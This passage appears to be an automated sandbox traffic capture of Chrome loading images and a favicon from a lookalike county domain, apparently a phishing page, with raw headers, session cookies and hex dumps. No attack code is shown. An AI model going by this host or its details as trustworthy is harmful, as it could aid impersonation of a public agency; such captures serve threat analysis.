                                                                          Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5; cf_clearance=WI3_X5Q8DqvBE7vRfDhgGrfo36.yzEAQnX7Fkgx1WLQ-1727822588-1.2.1.1-yVg.R8iXsSEyCdH6mpk7OwykeKWYET9_iK56vfB.G.m9J4LJqn2mjEGUcz_hgM6junbyj03Eoeyxghf7DKwQjnOHT_RV.dkyB8YOhZsRNoePwI64pJc2MVeitRkAjjMCWVl2FXYkhZ1d5WMaB4mbRLrIyh9e4TcPrwbqn58bq2kyq5mT_1oGYdVeO_3cvXt7CVTKoxVr8szlJlVf52OJy0NaLZzpmkKC87R2prCuqoJXWnwmag_1iRpA8JVYZTUVIx36Rn8K_V4I5xYC16R4Ea6wqGO2bZTTQXYUd7Ww2ArPF_on1ymBOKV6N_LGXJnc8r2nfHBk87oT30hKH5frHigjIy8ou5a2XpE4K4plr4D3fDah52V2p9j2UGAz6XwAu8c436H48fmfZT7BOzmQtT8s1xW6OSO7to8bPnw.0eUBWkz5qzk0jmBG3bn07J.o
                                                                          2024-10-01 22:43:17 UTC636INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:43:16 GMT
                                                                          Content-Type: image/svg+xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Last-Modified: Tue, 01 Oct 2024 20:49:23 GMT
                                                                          Vary: Accept-Encoding
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z4o71mXHBcx9%2Br2OUoVDyVO6z9jLzoXXSYEyDm4QpLGaCG5%2Fhi6Bc3uX1B4qjbx5pywNxIvjNznTaVQ9lZK52yNwzafcIFx570%2BJ4jsos88ttTceQFn68Qye3T3%2F5ODyHrb8GFNZ0TaHH7KPvrH8Rru%2FlSYa%2FjQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff87c682e8c6c-EWR
                                                                          2024-10-01 22:43:17 UTC733INData Raw: 36 33 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 34 38 20 34 38 22 3e 3c 64 65 66 73 3e 3c 73 74 79 6c 65 3e 2e 61 7b 66 69 6c 6c 3a 6e 6f 6e 65 3b 7d 2e 62 7b 66 69 6c 6c 3a 23 34 30 34 30 34 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 64 65 66 73 3e 3c 72 65 63 74 20 63 6c 61 73 73 3d 22 61 22 20 77 69 64 74 68 3d 22 34 38 22 20 68 65 69 67 68 74 3d 22 34 38 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 62 22 20 64 3d 22 4d 34 30 2c 33 32 2e 35 37 38 56 34 30 48 33 32 56 33 36 48 32 38 56 33 32 48 32 34 56 32 38 2e 37 36 36 41 31 30 2e 36 38 39 2c 31 30 2e 36 38 39
                                                                          Data Ascii: 638<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><defs><style>.a{fill:none;}.b{fill:#404040;}</style></defs><rect class="a" width="48" height="48"/><path class="b" d="M40,32.578V40H32V36H28V32H24V28.766A10.689,10.689
                                                                          2024-10-01 22:43:17 UTC866INData Raw: 2c 31 30 2e 38 37 39 2c 30 2c 30 2c 31 2d 2e 33 35 39 2c 31 2e 35 33 31 5a 6d 2d 32 2c 2e 38 34 34 4c 32 37 2e 32 31 39 2c 32 32 2e 36 34 31 61 31 34 2e 37 31 36 2c 31 34 2e 37 31 36 2c 30 2c 30 2c 30 2c 2e 35 36 32 2d 31 2e 37 38 32 41 37 2e 37 35 31 2c 37 2e 37 35 31 2c 30 2c 30 2c 30 2c 32 38 2c 31 39 61 38 2e 37 38 36 2c 38 2e 37 38 36 2c 30 2c 30 2c 30 2d 2e 37 2d 33 2e 35 2c 38 2e 39 2c 38 2e 39 2c 30 2c 30 2c 30 2d 31 2e 39 33 38 2d 32 2e 38 35 39 41 39 2e 32 36 39 2c 39 2e 32 36 39 2c 30 2c 30 2c 30 2c 32 32 2e 35 2c 31 30 2e 37 31 39 2c 38 2e 39 2c 38 2e 39 2c 30 2c 30 2c 30 2c 31 39 2c 31 30 61 38 2e 37 38 36 2c 38 2e 37 38 36 2c 30 2c 30 2c 30 2d 33 2e 35 2e 37 2c 38 2e 39 2c 38 2e 39 2c 30 2c 30 2c 30 2d 32 2e 38 35 39 2c 31 2e 39 33 38 41 39
                                                                          Data Ascii: ,10.879,0,0,1-.359,1.531Zm-2,.844L27.219,22.641a14.716,14.716,0,0,0,.562-1.782A7.751,7.751,0,0,0,28,19a8.786,8.786,0,0,0-.7-3.5,8.9,8.9,0,0,0-1.938-2.859A9.269,9.269,0,0,0,22.5,10.719,8.9,8.9,0,0,0,19,10a8.786,8.786,0,0,0-3.5.7,8.9,8.9,0,0,0-2.859,1.938A9
                                                                          2024-10-01 22:43:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          47192.168.2.649798104.21.55.674434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:43:16 UTC1319OUTGET /2svg/ZLWhvXZy16NYSMW HTTP/1.1
                                                                          Host: sanbernardinoscounty.telcom-info.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5; cf_clearance=WI3_X5Q8DqvBE7vRfDhgGrfo36.yzEAQnX7Fkgx1WLQ-1727822588-1.2.1.1-yVg.R8iXsSEyCdH6mpk7OwykeKWYET9_iK56vfB.G.m9J4LJqn2mjEGUcz_hgM6junbyj03Eoeyxghf7DKwQjnOHT_RV.dkyB8YOhZsRNoePwI64pJc2MVeitRkAjjMCWVl2FXYkhZ1d5WMaB4mbRLrIyh9e4TcPrwbqn58bq2kyq5mT_1oGYdVeO_3cvXt7CVTKoxVr8szlJlVf52OJy0NaLZzpmkKC87R2prCuqoJXWnwmag_1iRpA8JVYZTUVIx36Rn8K_V4I5xYC16R4Ea6wqGO2bZTTQXYUd7Ww2ArPF_on1ymBOKV6N_LGXJnc8r2nfHBk87oT30hKH5frHigjIy8ou5a2XpE4K4plr4D3fDah52V2p9j2UGAz6XwAu8c436H48fmfZT7BOzmQtT8s1xW6OSO7to8bPnw.0eUBWkz5qzk0jmBG3bn07J.o
                                                                          2024-10-01 22:43:17 UTC632INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:43:16 GMT
                                                                          Content-Type: image/svg+xml
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Last-Modified: Tue, 01 Oct 2024 20:49:23 GMT
                                                                          Vary: Accept-Encoding
                                                                          CF-Cache-Status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vqyP%2FLx4bi6JqxjcfVdbrjhUchGRSP%2FjLnSxeYCa0LZB4fcBo%2BbYxRXItanpUqyCoclpnmLJRVg0gyQqEUYPU1kkq8KRu1Hy%2BA20hPvGfC52XgTHoNbyNe6vTQ0JuKC9Rt3TsKmZXjOULh0olZmehj2hpDNgLnM%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff87c6cd380d9-EWR
                                                                          2024-10-01 22:43:17 UTC737INData Raw: 37 34 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31
                                                                          Data Ascii: 748<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1
                                                                          2024-10-01 22:43:17 UTC1134INData Raw: 44 29 22 2f 3e 3c 2f 67 3e 3c 64 65 66 73 3e 3c 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 20 69 64 3d 22 41 22 20 63 78 3d 22 30 22 20 63 79 3d 22 30 22 20 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 39 30 29 20 73 63 61 6c 65 28 31 34 30 31 2e 36 20 31 37 32 30 2e 38 29 22 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 31 30 37 63 31 30 22 2f 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 63 34 63 34 63 34 22 20 73 74 6f 70 2d 6f 70 61 63 69 74 79 3d 22 30 22 2f 3e 3c 2f 72 61 64 69
                                                                          Data Ascii: D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radi
                                                                          2024-10-01 22:43:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          48192.168.2.649800104.21.55.674434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:43:16 UTC1318OUTGET /fav/BxFYbJCBp2C7xgu HTTP/1.1
                                                                          Host: sanbernardinoscounty.telcom-info.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Cookie: PHPSESSID=d2b586c48e6c37e4b46c75c985eb61c5; cf_clearance=WI3_X5Q8DqvBE7vRfDhgGrfo36.yzEAQnX7Fkgx1WLQ-1727822588-1.2.1.1-yVg.R8iXsSEyCdH6mpk7OwykeKWYET9_iK56vfB.G.m9J4LJqn2mjEGUcz_hgM6junbyj03Eoeyxghf7DKwQjnOHT_RV.dkyB8YOhZsRNoePwI64pJc2MVeitRkAjjMCWVl2FXYkhZ1d5WMaB4mbRLrIyh9e4TcPrwbqn58bq2kyq5mT_1oGYdVeO_3cvXt7CVTKoxVr8szlJlVf52OJy0NaLZzpmkKC87R2prCuqoJXWnwmag_1iRpA8JVYZTUVIx36Rn8K_V4I5xYC16R4Ea6wqGO2bZTTQXYUd7Ww2ArPF_on1ymBOKV6N_LGXJnc8r2nfHBk87oT30hKH5frHigjIy8ou5a2XpE4K4plr4D3fDah52V2p9j2UGAz6XwAu8c436H48fmfZT7BOzmQtT8s1xW6OSO7to8bPnw.0eUBWkz5qzk0jmBG3bn07J.o
                                                                          2024-10-01 22:43:17 UTC625INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:43:16 GMT
                                                                          Content-Type: image/x-icon
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Last-Modified: Tue, 01 Oct 2024 20:49:23 GMT
                                                                          Vary: Accept-Encoding
                                                                          cf-cache-status: DYNAMIC
                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TBjoMrGbSY9NULmaHzQvclXbX%2F1BqKyb3AOkcgCM480yQTi3LONk6E76wJ8IKd4YEM0DT54WGzoGF4Xq5nHD6DMw9LYGaVo3UhfPecNShD4ewdAh9Jk3k5UNGKQk2NF2Q2MkUNzsqn1vSI7sdyvipMz6whQkVoo%3D"}],"group":"cf-nel","max_age":604800}
                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff87c8b09c340-EWR
                                                                          2024-10-01 22:43:17 UTC744INData Raw: 34 33 31 36 0d 0a 00 00 01 00 06 00 80 80 10 00 00 00 00 00 68 28 00 00 66 00 00 00 48 48 10 00 00 00 00 00 e8 0d 00 00 ce 28 00 00 30 30 10 00 00 00 00 00 68 06 00 00 b6 36 00 00 20 20 10 00 00 00 00 00 e8 02 00 00 1e 3d 00 00 18 18 10 00 00 00 00 00 e8 01 00 00 06 40 00 00 10 10 10 00 00 00 00 00 28 01 00 00 ee 41 00 00 28 00 00 00 80 00 00 00 00 01 00 00 01 00 04 00 00 00 00 00 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33
                                                                          Data Ascii: 4316h(fHH(00h6 =@(A(("P"""""""""""""""""""""""""""""" 333333333
                                                                          2024-10-01 22:43:17 UTC1369INData Raw: 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22
                                                                          Data Ascii: """""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""
                                                                          2024-10-01 22:43:17 UTC1369INData Raw: 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33
                                                                          Data Ascii: 3333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 3333333333
                                                                          2024-10-01 22:43:17 UTC1369INData Raw: 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 20 00 00 03 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22
                                                                          Data Ascii: """""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""""""""""""""""""""""""""" 333333333333333333333333333333"""""
                                                                          2024-10-01 22:43:17 UTC1369INData Raw: 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55
                                                                          Data Ascii: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU
                                                                          2024-10-01 22:43:17 UTC1369INData Raw: 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44
                                                                          Data Ascii: DDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDD
                                                                          2024-10-01 22:43:17 UTC1369INData Raw: 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 50 00 00 04 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 44 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55
                                                                          Data Ascii: UUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUPDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUU
                                                                          2024-10-01 22:43:17 UTC1369INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0
                                                                          Data Ascii:
                                                                          2024-10-01 22:43:17 UTC1369INData Raw: 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 07 e0 00 00 00 00 00 00 00 28 00 00 00 48 00 00 00 90 00 00 00 01 00 04 00 00 00 00 00 80 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 00 ef a4 00 00 00 b9 ff 00 00 ba 7f 00 22 50 f2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33
                                                                          Data Ascii: (H"P"""""""""""""""""3333333
                                                                          2024-10-01 22:43:17 UTC1369INData Raw: 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 22 00 00 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 55 00 00 44 44 44 44 44 44 44 44
                                                                          Data Ascii: 333333333333"""""""""""""""""33333333333333333"""""""""""""""""33333333333333333UUUUUUUUUUUUUUUUUDDDDDDDD


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          49192.168.2.649801104.21.55.674434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:43:16 UTC1350OUTGET /logo_/c96dc13f1d8b04b0d1feb407ec1a1d4666fc7b03449ef HTTP/1.1
                                                                          Host: sanbernardinoscounty.telcom-info.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: image
                                                                          Referer: https://sanbernardinoscounty.telcom-info.com/&redirect=748a7e906055260effecf777292e4da84f206e0fmain&uid=f253efe302d32ab264a76e0ce65be76966fc7b00337d8
                                                                          Accept-Encoding: gzip, deflate, br
